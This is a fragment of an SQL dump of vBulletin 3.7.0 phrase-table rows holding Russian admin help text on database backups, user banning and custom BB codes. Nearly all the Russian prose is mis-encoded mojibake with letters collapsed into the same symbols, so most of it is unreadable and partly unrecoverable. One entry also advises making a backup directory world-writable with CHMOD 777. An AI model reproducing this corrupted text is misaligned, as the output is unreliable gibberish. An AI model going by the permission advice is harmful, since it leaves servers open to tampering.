(21993, -1, 'backup_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ \r\nÂîññòà ÃîâëåÃèå/îïòèìèçà öèÿ \r\nÎáÃîâëåÃèå ñ÷¸ò÷èêîâ \r\nÄèà ãÃîñòèêà \r\nÂûïîëÃÃ¥Ãèå SQL çà ïðîñà \r\n\r\nÃåçåðâÃîå êîïèðîâà Ãèå áà çû äà ÃÃûõ: \r\nÑêðèïò ðåçåðâÃîãî êîïèðîâà Ãèÿ áà çû äà ÃÃûõ ôîðóìà ìîæåò áûòü èñïîëüçîâà à äëÿ ðåçåðâÃîãî êîïèðîâà Ãèÿ áà çû äà ÃÃûõ âà øåãî ôîðóìà . ÃîìÃèòå, ÷òî ýòîò ñêðèïò ÃÃ¥ ÿâëÿåòñÿ ëó÷øèì ñïîñîáîì ðåçåðâÃîãî êîïèðîâà Ãèÿ, òà ê êà ê ìîæåò âûçâà òü òà éìà óò PHP, îñîáåÃÃî ïðè áîëüøèõ áà çà õ äà ÃÃûõ. Åñëè âû èñïîëüçóåòå ýòîò ñêðèïò äëÿ ðåçåðâÃîãî êîïèðîâà Ãèÿ âà øåé áà çû äà ÃÃûõ, òî, âåðîÿòÃî, ïîëó÷èòå ÃåïîëÃîå ðåçåðâÃîå êîïèðîâà Ãèå. \r\n\r\nÃåêîìåÃäóåìûé ñïîñîá ðåçåðâÃîãî êîïèðîâà Ãèÿ - èñïîëüçîâà òü êîìà Ãäó mysqldump ÷åðåç telnet / SSH. Ãîñìîòðèòå ýòè èÃñòðóêöèè , ÷òîáû óçÃà òü êà ê ñäåëà òü ðåçåðâÃîå êîïèðîâà Ãèå âà øåé áà çû äà ÃÃûõ, èñïîëüçóÿ êîìà ÃäÃóþ ñòðîêó ÷åðåç Telnet èëè SSH.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21994, -1, 'backup_title', 'cphelptext', 'ÃŽ ðåçåðâÃîì êîïèðîâà Ãèè áà çû äà ÃÃûõ', 'vbulletin', '', 0, ''),
(21995, -1, 'backup_choose_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå åñòü 3 âà ðèà Ãòà ðåçåðâÃîãî êîïèðîâà Ãèÿ. Ãåðâûé - ñäåëà òü âûáîðî÷Ãîå ðåçåðâÃîå êîïèðîâà Ãèå òà áëèö. Ãòî ïîçâîëèò ñäåëà òü ðåçåðâÃîå êîïèðîâà Ãèå òà áëèö, êîòîðûå âû âûáåðèòå è âûâåäåò åãî Ãà ýêðà Ã. Çà òåì âû ñîõðà Ãèòå ïîëó÷åÃÃóþ ñòðà Ãè÷êó ê ñåáå Ãà êîìïüþòåð. Ãòî ìîæåò ïðèâåñòè ê òîìó, ÷òî îáîçðåâà òåëü çà âåðøèò çà ãðóçêó ïî òà éìà óòó, åñëè áà çà âÃóøèòåëüÃûõ ðà çìåðîâ. Ìû ðåêîìåÃäóåì ïðîâåðèòü öåëîñòÃîñòü ýòîãî âèäà ðåçåðâÃîãî êîïèðîâà Ãèÿ, ïîñëå òîãî êà ê âû åãî ñäåëà åòå, è äî òîãî êà ê âà ì ïîÃà äîáèòñÿ âîññòà Ãîâèòü åãî. Ã’.Ã¥. ñäåëà éòå ýòî ñåé÷à ñ. :) \r\n\r\nÑîõðà ÃÃ¥Ãèå ôà éëà Ãà âà ø ñåðâåð - ýòî òîæå ñà ìîå, ÷òî äåëà åò mysqldump. Ãòî ìîæåò ïðèâåñòè ê òà éìà óòó PHP, òà ê ÷òî ìû ÃÃ¥ ìîæåì ðåêîìåÃäîâà òü åãî êà ê ëó÷øèé âûáîð. Åñëè âû áóäåòå åãî èñïîëüçîâà òü, òî ââåäèòå ïóòü è èìÿ ôà éëà äëÿ ôà éëà ðåçåðâÃîãî êîïèðîâà Ãèÿ. Îà ìîæåò èìåòü ëþáîå ðà ñøèðåÃèå, õîòÿ, âåðîÿòÃî, âû çà õîòèòå Ãà çâà òü åãî .sql, ÷òîáû çà ïîìÃèòü ÷òî ýòî. Çà ìåòèì, ÷òî PHP äîëæåà èìåòü äîñòóï äëÿ çà ïèñè â äèðåêòîðèþ, êîòîðóþ âû óêà æèòå. Îáû÷Ãî ýòî îçÃà ÷à åò, ÷òî CHMOD äèðåêòîðèè 777. Èçó÷èòå äîêóìåÃòà öèþ ïî FTP, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü. \r\n\r\nCSV äà ìï äà ÃÃûõ ñîçäà ¸ò CSV (comma-separated values - çÃà ÷åÃèÿ ñ ðà çäåëèòåëÿìè-çà ïÿòûìè) ôà éë, êîòîðûé ìîæåò áûòü èìïîðòèðîâà à ÷åðåç êîìà ÃäÃóþ ñòðîêó èëè phpMyAdmin. Ãòî òà êæå ìîæåò ïðèâåñòè ê òà éìà óòó êà ê PHP, òà ê è îáîçðåâà òåëÿ, òà ê êà ê ðåçóëüòà ò âûâîäèòñÿ Ãà ýêðà Ã. Âûáåðèòå îäÃó òà áëèöó çà ðà ç, ñèìâîë ðà çäåëèòåëÿ (çà ïîìÃèòå åãî, ò.ê. ýòî ïîÃà äîáèòñÿ âà ì ïðè äà ëüÃåéøåì èìïîðòèðîâà Ãèè ôà éëà ), êà êèå êà âû÷êè äîëæÃû áûòü âîêðóã äà ÃÃûõ, è ïîêà çûâà òü èëè Ãåò Ãà çâà Ãèÿ êîëîÃîê.', 'vbulletin', '', 0, ''),
(21996, -1, 'backup_choose_title', 'cphelptext', 'ÃåçåðâÃîå êîïèðîâà Ãèå âà øåé áà çû äà ÃÃûõ', 'vbulletin', '', 0, ''),
(21997, -1, 'backup_choose_filename_text', 'cphelptext', 'Ââåäèòå èìÿ ôà éëà è ïóòü. Ãòîò ïóòü äîëæåà áûòü îòÃîñèòåëüÃûì îò âà øåé äîìà øÃåé äèðåêòîðèè âåá-ñåðâåðà , êîòîðà ÿ îáû÷Ãî Ãà õîäèòñÿ Ãà óðîâåÃü âûøå âà øåé êîðÃåâîé ñåòåâîé äèðåêòîðèè. ÃåêîìåÃäóåòñÿ ñîõðà Ãèòü ôà éë âà øåãî ðåçåðâÃîãî êîïèðîâà Ãèÿ â ïà ïêó, ÃåäîñòóïÃóþ èç ñåòè. \r\n\r\nÅñëè âû æåëà åòå ñîõðà Ãèòü âà øå ðåçåðâÃîå êîïèðîâà Ãèå â âà øó äîìà øÃþþ äèðåêòîðèþ, òî ïðîñòî ââåäèòå ñþäà èìÿ ôà éëà , Ãà ïðèìåð \"forumbackup.sql\". Åñëè âû æåëà åòå ñîõðà Ãèòü âà øå ðåçåðâÃîå êîïèðîâà Ãèå â îäÃó èç ïîääèðåêòîðèé äîìà øÃåé äèðåêòîðèè, òî ñÃà ÷à ëà ââåäèòå ïóòü ê ôà éëó, Ãà ïðèìåð \"/path/to/directory/forumbackup.sql\". \r\n\r\nÈìÿ ôà éëà äîëæÃî çà êà Ã÷èâà òüñÿ ðà ñøèðåÃèåì \".sql\".', 'vbulletin', '', 0, ''),
(21998, -1, 'backup_choose_filename_title', 'cphelptext', 'Ãóòü è èìÿ ôà éëà äëÿ ñîõðà ÃÃ¥Ãèÿ ðåçåðâÃîãî êîïèðîâà Ãèÿ', 'vbulletin', '', 0, ''),
(21999, -1, 'backup_choose_table_text', 'cphelptext', 'Âûáåðèòå òà áëèöó áà çû äà ÃÃûõ, äëÿ êîòîðîé ñîáèðà åòåñü äåëà òü ðåçåðâÃîå êîïèðîâà Ãèå. Çà ïèñè èç ýòîé òà áëèöû áóäóò ñîõðà ÃÃ¥Ãû â ôà éëå ðåçåðâÃîãî êîïèðîâà Ãèÿ.', 'vbulletin', '', 0, ''),
(22000, -1, 'backup_choose_separator_text', 'cphelptext', 'Ñèìâîë ðà çäåëèòåëÿ èñïîëüçóåòñÿ äëÿ ðà çäåëåÃèÿ ïîëåé, ïî óìîë÷à Ãèþ ýòî çà ïÿòà ÿ.', 'vbulletin', '', 0, ''),
(22001, -1, 'backup_choose_separator_title', 'cphelptext', 'Ñèìâîë-ðà çäåëèòåëü', 'vbulletin', '', 0, ''),
(22002, -1, 'backup_choose_quotes_text', 'cphelptext', 'Ãîëÿ, ñîäåðæà ùèå ðà çäåëèòåëü ïîëåé (çà ïÿòà ÿ ïî óìîë÷à Ãèþ) èëè èÃòåðâà ëû, äîëæÃû áûòü çà êëþ÷åÃû ñèìâîëà ìè êà âû÷åê, ïî óìîë÷à Ãèþ ýòî äâîéÃûå êà âû÷êè (\"\").', 'vbulletin', '', 0, ''),
(22003, -1, 'backup_choose_quotes_title', 'cphelptext', 'Ñèìâîë öèòà òû', 'vbulletin', '', 0, ''),
(22004, -1, 'backup_choose_showhead_text', 'cphelptext', 'Ãòà îïöèÿ äîáà âèò Ãà çâà Ãèÿ êîëîÃîê â ïåðâûå ñòðîêè ôà éëà CSV. Ãòî ïîëåçÃî äëÿ ïðîãðà ìì, ðåäà êòèðóþùèõ òà áëèöû (Ãà ïðèìåð, MS Excel).', 'vbulletin', '', 0, ''),
(22005, -1, 'backup_choose_showhead_title', 'cphelptext', 'Äîáà âèòü Ãà çâà Ãèå êîëîÃêè', 'vbulletin', '', 0, ''),
(22006, -1, 'backup_mysqldump_text', 'cphelptext', 'Òà êæå ëåãêî ñäåëà òü ðåçåðâÃîå êîïèðîâà Ãèå âà øåé áà çû äà ÃÃûõ ÷åðåç Telnet èëè SSH. Ãðîöåññ îäèÃà êîâ â îáîèõ ñëó÷à ÿõ. Ãîñëå òîãî, êà ê âû âîøëè Ãà âà ø ñåðâåð, ââåäèòå â êîìà ÃäÃóþ ñòðîêó: \r\nmysqldump --opt -uUSERNAME -p DATABASENAME > /path/to/dump.sql è Ãà æìèòå Enter. (Çà ìåÃèòå USERNAME, DATABASENAME, è /path/to/dump.sql âà øèì èìåÃåì ïîëüçîâà òåëÿ è èìåÃåì áà çû äà ÃÃûõ MySQL, à òà êæå ïóòü è èìÿ ôà éëà , êóäà âû æåëà åòå ñîõðà Ãèòü ðåçåðâÃîå êîïèðîâà Ãèå.) Ó âà ñ çà ïðîñÿò ïà ðîëü. Ââåäèòå åãî è Ãà æìèòå Enter. Âû âåðÃåòåñü â êîìà ÃäÃóþ ñòðîêó, êîãäà êîìà Ãäà âûïîëÃèòñÿ; ýòî äîëæÃî çà Ãÿòü îò 30 ñåêóÃä äî Ãåñêîëüêèõ ìèÃóò, â îòëè÷èè îò ðà çìåðà âà øåé áà çû äà ÃÃûõ. \r\nÃðîâåðüòå, ÷òî ïîÿâèëñÿ ôà éë dump.sql â /path/to (òî÷Ãåå óêà çà ÃÃûé âà ìè ôà éë ïî óêà çà ÃÃîìó ïóòè). Åñëè Ãåò è âû ÃÃ¥ ïîëó÷èëè Ãèêà êèõ ñîîáùåÃèé îá îøèáêå, òî ïåðåïðîâåðüòå ââåäåÃÃûé ïóòü. Åñëè äåéñòâèòåëüÃî ïî óêà çà ÃÃîìó ïóòè ôà éëà Ãåò, òî ïîïðîñèòå âà øåãî õîñòåðà ïîèñêà òü ôà éë Ãà âñåì ñåðâåðå, èëè ñäåëà åòå ðåçåðâÃîå êîïèðîâà Ãèå ñÃîâà .', 'vbulletin', '', 0, ''),
(22007, -1, 'backup_mysqldump_title', 'cphelptext', 'ÃåçåðâÃîå êîïèðîâà Ãèå âà øåé áà çû äà ÃÃûõ ÷åðåç Telnet/SSH', 'vbulletin', '', 0, ''),
(22008, -1, 'banning_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîëüçîâà òåëè \r\nÓïðà âëåÃèå ïîëüçîâà òåëÿìè \r\nÃëîêèðîâêà ïîëüçîâà òåëÿ \r\nÃà ññûëêà ýëåêòðîÃÃûõ ïèñåì \r\nÌà ñêè äîñòóïà \r\n\r\nÃëîêèðîâêà ïîëüçîâà òåëÿ: \r\nÑòðà Ãèöû áëîêèðîâêè â çà êëà äêå Ãîëüçîâà òåëè ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëÿþò âà ì áëîêèðîâà òü è ïðîñìà òðèâà òü óæå çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé. \r\n\r\nÂû ìîæåòå çà áëîêèðîâà òü ïîëüçîâà òåëåé Ãà ñòðà Ãèöå Ãëîêèðîâêà ïîëüçîâà òåëÿ â ïà Ãåëè ìîäåðà òîðà . Âà ì ïðåäîñòà âëÿåòñÿ âûáîð ïðîäîëæèòåëüÃîñòè áëîêèðîâêè è ãðóïïû ïîëüçîâà òåëåé, â êîòîðóþ äîëæåà áûòü ïåðåìåùåà ïîëüçîâà òåëü. Åñëè âû æåëà åòå, ÷òîáû ãðóïïà ïîëüçîâà òåëåé èñïîëüçîâà ëà ñü äëÿ áëîêèðîâêè, òî âà ì ÃóæÃî âêëþ÷èòü îïöèþ \"Ãòà ãðóïïà ïîëüçîâà òåëåé - \'Çà áëîêèðîâà ÃÃûå\'\" â Óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé ; âñå ãðóïïû ïîëüçîâà òåëåé ñ âêëþ÷åÃÃîé çäåñü îïöèåé áóäóò äîñòóïÃûìè äëÿ âûáîðà Ãà ñòðà Ãèöå Ãëîêèðîâêè ïîëüçîâà òåëÿ. \r\n\r\nÄîïîëÃèòåëüÃî, âû ìîæåòå ïðîñìîòðåòü ñïèñîê çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé Ãà ñòðà Ãèöå \"Çà áëîêèðîâà ÃÃûå ïîëüçîâà òåëè\" â ïà Ãåëè ìîäåðà òîðà . Ãòà ñòðà Ãèöà ïîêà æåò âà ì âñåõ ïîëüçîâà òåëåé, çà áëîêèðîâà Ãû âðåìåÃÃî èëè ïîñòîÿÃÃî, à òà êæå äà ñò âîçìîæÃîñòü ðà çáëîêèðîâà òü ëþáîãî ïî âà øåìó âûáîðó.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22009, -1, 'banning_title', 'cphelptext', 'Î áëîêèðîâêå ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(22010, -1, 'banning_banuser_text', 'cphelptext', 'Çäåñü âû ìîæåòå áëîêèðîâà òü ïî èìåÃè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(22011, -1, 'banning_banuser_title', 'cphelptext', 'Çà áëîêèðîâà òü', 'vbulletin', '', 0, ''),
(22012, -1, 'banning_banuser_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâà òåëÿ, êîòîðîãî âû æåëà åòå çà áëîêèðîâà òü.', 'vbulletin', '', 0, ''),
(22013, -1, 'banning_banuser_username_title', 'cphelptext', 'Èìÿ ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(22014, -1, 'banning_banuser_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22015, -1, 'banning_banuser_usergroupid_title', 'cphelptext', 'Ãåðåìåñòèòü â ãðóïïó', 'vbulletin', '', 0, ''),
(22016, -1, 'banning_banuser_period_text', 'cphelptext', 'Âûáåðèòå ïðîäîëæèòåëüÃîñòü áëîêèðîâêè.', 'vbulletin', '', 0, ''),
(22017, -1, 'banning_banuser_period_title', 'cphelptext', 'ÑÃÿòü áëîêèðîâêó ïîñëå...', 'vbulletin', '', 0, ''),
(22018, -1, 'banning_banuser_editreason_reason_text', 'cphelptext', 'Ãòîò òåêñò áóäåò îòîáðà æà òüñÿ çà áëîêèðîâà ÃÃûì ïîëüçîâà òåëÿì, êîòîðûå ïîïûòà þòñÿ âîéòè Ãà ôîðóì.', 'vbulletin', '', 0, ''),
(22019, -1, 'banning_banuser_editreason_reason_title', 'cphelptext', 'Ãðè÷èÃà , îòîáðà æà åìà ÿ ïîëüçîâà òåëþ', 'vbulletin', '', 0, ''),
(22020, -1, 'banning_modify_text', 'cphelptext', 'Ãòî ñïèñîê çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé Ãà âà øåì ôîðóìå. Ãèæå - èÃôîðìà öèÿ î ïðîäîëæèòåëüÃîñòè áëîêèðîâêè äëÿ êà æäîãî. Âû ìîæåòå ñÃÿòü áëîêèðîâêó, Ãà æà â Ãà ññûëêó ñïðà âà \"[ÑÃÿòü Ãëîêèðîâêó]\".', 'vbulletin', '', 0, ''),
(22021, -1, 'banning_modify_title', 'cphelptext', 'Çà áëîêèðîâà ÃÃûå ïîëüçîâà òåëè', 'vbulletin', '', 0, ''),
(22022, -1, 'bbcode_text', 'cphelptext', 'BB êîäû: \r\nBB êîä - ñïåöèà ëüÃà ÿ êîäèðóþùà ÿ ñèñòåìà , èäåÃòè÷Ãà ÿ HTML, ãäå âû ââîäèòå òåãè âîêðóã âà øåãî òåêñòà , è òåêñò ôîðìà òèðóåòñÿ. Ãà ïðèìåð, ââåäÿ: \r\n\r\n[b]Ìîé òåêñò[/b] \r\n\r\n... âû ïîëó÷èòå: \r\n\r\nÌîé òåêñò \r\n\r\nÃòîò áåçîïà ñÃûé è ëåãêèé ïóòü ïîçâîëèòü âà øèì ïîëüçîâà òåëÿì ôîðìà òèðîâà òü èõ ñîîáùåÃèÿ. Âû ÃÃ¥ ïîäâåðãà åòåñü ðèñêó Ãà ðóøåÃèÿ áåçîïà ñÃîñòè, ÷òî ìîæåò ïðîèçîéòè, åñëè âû ðà çðåøèòå èñïîëüçîâà òü HTML â ñîîáùåÃèÿõ, è ïîëüçîâà òåëè ÃÃ¥ ìîãóò ñìåøà òü ñîäåðæèìîå ñòðà Ãèöû, âûâîäèìîå Ãà ýêðà Ã, ñ äðóãèìè òåãà ìè.  ïà Ãåëè à äìèÃèñòðà òîðà âû ìîæåòå âûáðà òü, êà êèå BB êîäû áóäóò äîñòóïÃû âà øèì ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1206965994, '3.7.0 Release Candidate 2'),
(22023, -1, 'bbcode_title', 'cphelptext', 'Î BB êîäà õ', 'vbulletin', '', 0, ''),
(22024, -1, 'bbcode_add_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì äîáà âëÿòü Ãîâûé BB êîä. \r\n\r\nÎáúÿñÃÃ¥Ãèÿ îïöèé Ãà ýòîé ñòðà Ãèöå Ãà õîäÿòñÿ Ãèæå.', 'vbulletin', 'zCarot', 1206965920, '3.7.0 Release Candidate 2'),
(22025, -1, 'bbcode_add_title', 'cphelptext', 'Äîáà âëåÃèå Ãîâîãî BB êîäà ', 'vbulletin', 'zCarot', 1206965930, '3.7.0 Release Candidate 2'),
(22026, -1, 'bbcode_add_edit_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå âà øåãî BB êîäà , êîòîðîå áóäåò èñïîëüçîâà Ãî Ãà ïîëüçîâà òåëüñêîé ñòðà Ãèöå îáúÿñÃÃ¥Ãèÿ BB êîäîâ , âìåñòå ñ äðóãèìè ïà ðà ìåòðà ìè, êðîìå \"Èñïîëüçîâà òü îïöèè\". ', 'vbulletin', 'zCarot', 1206965906, '3.7.0 Release Candidate 2'),
(22027, -1, 'bbcode_add_edit_title_title', 'cphelptext', 'Ãà çâà Ãèå BB êîäà ', 'vbulletin', '', 0, ''),
(22028, -1, 'bbcode_add_edit_bbcodetag_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå BB êîäà , êîòîðûé çà êëþ÷à åòñÿ â êâà äðà òÃûå ñêîáêè. \r\nÃà ïðèìåð, åñëè âû õîòåëè áû äîáà âèòü ñïåöèà ëüÃûé BB êîä [b], êîòîðûé äåëà ë áû òåêñò ïîëóæèðÃûì, òî â ýòîì ïîëå âà ì ÃóæÃî ââåñòè ïðîñòî b (áåç êâà äðà òÃûõ ñêîáîê). ', 'vbulletin', 'zCarot', 1206965809, '3.7.0 Release Candidate 2'),
(22029, -1, 'bbcode_add_edit_bbcodetag_title', 'cphelptext', 'BB êîä', 'vbulletin', '', 0, ''),
(22030, -1, 'bbcode_add_edit_bbcodereplacement_text', 'cphelptext', 'Ãòî êîä HTML, Ãà êîòîðûé çà ìåÃÿåòñÿ ââåäåÃÃûé ïîëüçîâà òåëåì BB êîä. Óáåäèòåñü, ÷òî âû âêëþ÷èëè \'{param}\' (áåç êà âû÷åê), ÷òîáû âêëþ÷èòü â HTML êîä òåêñò, Ãà õîäÿùèéñÿ ìåæäó âÃóòðè BB êîäà , à òà êæå \'{option}\', ÷òîáû âêëþ÷èòü òåêñò îïöèè BB êîäà . Âû ìîæåòå èñïîëüçîâà òü {option}, òîëüêî åñëè âû âêëþ÷åà ïà ðà ìåòð \"Èñïîëüçîâà òü îïöèþ\". \r\nÃà ïðèìåð, âû æåëà åòå ñäåëà òü ïðåîáðà çîâà Ãèå èç [b]Ìîé òåêñò[/b] â Ìîé òåêñò . Äëÿ ýòîãî ââåäèòå \r\n<b>{param}</b> \r\nÅñëè âû ñîçäà åòå BB êîä, ïîõîæèé Ãà BB êîä URL, òî âû ìîæåòå èñïîëüçîâà òü {option}. BB êîä URL ìîæåò áûòü èñïîëüçîâà à òà ê: \r\n[url]http://www.example.com[/url] \r\n÷òî ïðåâðà ùà åòñÿ â \r\nhttp://www.example.com/ \r\nÅù¸ îà ìîæåò áûòü èñïîëüçîâà à è âîò òà ê: \r\n[url=http://www.example.com/]Êà êîé-òî ñà éò[/url] \r\n÷òî ïðåâðà ùà åòñÿ â: \r\nÊà êîé-òî ñà éò \r\nÃòî äâà ñîâåðøåÃÃî ðà çÃûõ BB êîäà , Ãî ñ îäèÃà êîâûì Ãà çâà Ãèåì, ÷òîáû óïðîñòèòü åãî èñïîëüçîâà Ãèå. \r\n×òîáû ñîçäà òü ïåðâûé BB êîä, âû äîëæÃû ââåñòè \r\n<a href=\"{param}\">{param}</a> \r\n×òîáû ñîçäà òü âòîðîé, ââåäèòå \r\n<a href=\"{option}\">{param}</a> \r\nÅñëè âû èñïîëüçóåòå îïöèè, òî \'{option}\' äîëæåà áûòü ââåäåà â Ãà ÷à ëüÃîé ÷à ñòè BB êîäà , Ãà ïðèìåð, åñëè îïöèÿ \"www.example.com\", òî ñëåäóåò ââîäèòü âîò òà ê: \r\n[url=www.example.com] \r\n{param} äîëæåà áûòü ââåäåà âÃóòðè BB êîäà . Ãà ïðèìåð, åñëè òðåáóåòñÿ ââåñòè \"Ìîé ñà éò\", òî ñëåäóåò Ãà ïèñà òü âîò òà ê: \r\n[url=www.example.com]Ìîé ñà éò[/url] \r\nBB êîä îáÿçà òåëüÃî áóäåò èìåòü òåêñò âÃóòðè, Ãà õîäÿùèéñÿ â ïåðåìåÃÃîé \'{param}\'. Îïöèÿ \'{option}\' áóäåò ðà ññìà òðèâà òüñÿ òîëüêî â òîì ñëó÷à å, åñëè âêëþ÷¸à ïà ðà ìåòð \"Èñïîëüçîâà òü îïöèþ\". Ãòî ñäåëà Ãî èç-çà òîãî, ÷òî âî ìÃîãèõ ñëó÷à ÿõ äîïîëÃèòåëüÃûõ óêà çà Ãèé ÃÃ¥ òðåáóåòñÿ.', 'vbulletin', 'zCarot', 1206965793, '3.7.0 Release Candidate 2'),
(22031, -1, 'bbcode_add_edit_bbcodereplacement_title', 'cphelptext', 'Çà ìåÃà BB êîäà ', 'vbulletin', '', 0, ''),
(22032, -1, 'bbcode_add_edit_bbcodeexample_text', 'cphelptext', 'Ãòî îáðà çåö ÷à ñòè BB êîäà , îà èñïîëüçóåòñÿ êà ê ïðèìåð äëÿ êîÃêðåòÃîãî BB êîäà . \r\nÃ’.Ã¥. ÷òîáû ïîêà çà òü, êà ê èñïîëüçîâà òü BB êîä [b], âû äîëæÃû ââåñòè [b]Êà êîé-Ãèáóäü òåêñò[/b].', 'vbulletin', 'zCarot', 1206964403, '3.7.0 Release Candidate 2'),
(22033, -1, 'bbcode_add_edit_bbcodeexample_title', 'cphelptext', 'Ãðèìåð BB êîäà ', 'vbulletin', '', 0, ''),
(22034, -1, 'bbcode_add_edit_bbcodeexplanation_text', 'cphelptext', 'Ãòîò òåêñò äîëæåà îïèñà òü äåéñòâèå BB êîäà . Îà ìîæåò âêëþ÷à òü HTML ïî âà øåìó æåëà Ãèþ.', 'vbulletin', '', 0, ''),
(22035, -1, 'bbcode_add_edit_bbcodeexplanation_title', 'cphelptext', 'ÎáúÿñÃÃ¥Ãèå BB êîäà ', 'vbulletin', '', 0, ''),
(22036, -1, 'bbcode_add_edit_twoparams_text', 'cphelptext', 'Óñòà Ãà âëèâà ÿ ýòó îïöèþ Ãà \"Äà \", âû ðà çðåøà åòå ñîçäà âà òü BB êîä ñ îïöèåé ([BBêîä=\"îïöèÿ\"]òåêñò[/BBêîä], â ïðîòèâîïîëîæÃîñòü ïðîñòîìó BB êîäó [BBêîä]òåêñò[/BBêîä].', 'vbulletin', '', 0, ''),
(22037, -1, 'bbcode_add_edit_twoparams_title', 'cphelptext', 'Èñïîëüçîâà òü îïöèþ', 'vbulletin', '', 0, ''),
(22038, -1, 'bbcode_add_edit_buttonimage_text', 'cphelptext', 'Åñëè âû æåëà åòå, ÷òîáû ýòîò BB êîä îòîáðà æà ëñÿ êà ê êÃîïêà Ãà ïà Ãåëè ðåäà êòîðà ñîîáùåÃèé, òî ââåäèòå URL èçîáðà æåÃèÿ ðà çìåðîì 21 x 20 ïèêñåëåé, êîòîðîå áóäåò ÿâëÿòüñÿ êÃîïêîé äëÿ âñòà âêè BB êîäà .', 'vbulletin', 'zCarot', 1206966286, '3.7.0 Release Candidate 2'),
(22039, -1, 'bbcode_add_edit_buttonimage_title', 'cphelptext', 'Èçîáðà æåÃèå êÃîïêè (ÃÃ¥ îáÿçà òåëüÃî)', 'vbulletin', '', 0, ''),
(22040, -1, 'bbcode_add_edit_strip_empty_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðà Ãà , òî òà êèå BB êîäû, ïðè îòñóòñòâèè òåêñòà âÃóòðè Ãèõ, áóäóò óäà ëÿòüñÿ (Ãà ïðèìåð, [BBêîä][/BBêîä]).', 'vbulletin', 'zCarot', 1191575557, '3.7.0 Beta 1'),
(22041, -1, 'bbcode_add_edit_strip_empty_title', 'cphelptext', 'Óäà ëèòü BB êîä, åñëè îòñóòñòâóåò òåêñò', 'vbulletin', 'zCarot', 1194351163, '3.7.0 Beta 1'),
(22042, -1, 'bbcode_add_edit_stop_parse_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðà Ãà , òî ëþáûå BB êîäû âÃóòðè ýòîãî BB êîäà áóäóò îòîáðà æà òüñÿ êà ê îáû÷Ãûé òåêñò. \r\n\r\nÃà ïðèìåð:\r\n[BBêîä][b]êà êîé-òî òåêñò çäåñü[/b][/BBêîä] \r\n\r\nÅñëè çäåñü ñòîèò \"Äà \", òî áóäåò îòîáðà æà òüñÿ êà ê:\r\n\r\n[b]êà êîé-òî òåêñò çäåñü[/b] \r\n\r\nÀ åñëè Ãåò, òî âîò òà ê:\r\n\r\nêà êîé-òî òåêñò çäåñü ', 'vbulletin', 'zCarot', 1206965837, '3.7.0 Release Candidate 2'),
(22043, -1, 'bbcode_add_edit_stop_parse_title', 'cphelptext', 'Âûêëþ÷èòü BB êîäû âÃóòðè ýòîãî BB êîäà ', 'vbulletin', 'zCarot', 1206965892, '3.7.0 Release Candidate 2'),
(22044, -1, 'bbcode_add_edit_disable_smilies_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðà Ãà , òî ëþáûå ñìà éëû âÃóòðè ýòîãî BB êîäà áóäóò îòîáðà æà òüñÿ êà ê îáû÷Ãûé òåêñò.', 'vbulletin', 'zCarot', 1191575937, '3.7.0 Beta 1'),
(22045, -1, 'bbcode_add_edit_disable_smilies_title', 'cphelptext', 'Âûêëþ÷èòü ñìà éëû âÃóòðè ýòîãî BB êîäà ', 'vbulletin', 'zCarot', 1194351209, '3.7.0 Beta 1'),
(22046, -1, 'bbcode_add_edit_disable_wordwrap_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðà Ãà , òî òåêñò âÃóòðè ýòîãî BB êîäà ÃÃ¥ áóäåò ïåðåÃîñèòüñÿ à âòîìà òè÷åñêè.', 'vbulletin', 'zCarot', 1191575977, '3.7.0 Beta 1'),
(22047, -1, 'bbcode_add_edit_disable_wordwrap_title', 'cphelptext', 'Âûêëþ÷èòü ïåðåÃîñ ñòðîê âÃóòðè ýòîãî BB êîäà ', 'vbulletin', 'zCarot', 1194351224, '3.7.0 Beta 1'),
(22048, -1, 'bbcode_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ðåäà êòèðîâà òü ïà ðà ìåòðû ñóùåñòâóþùèõ BB êîäîâ. Îïöèè îáúÿñÃÿþòñÿ Ãèæå.', 'vbulletin', 'zCarot', 1206965938, '3.7.0 Release Candidate 2'),
(22049, -1, 'bbcode_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå BB êîäîâ', 'vbulletin', '', 0, ''),
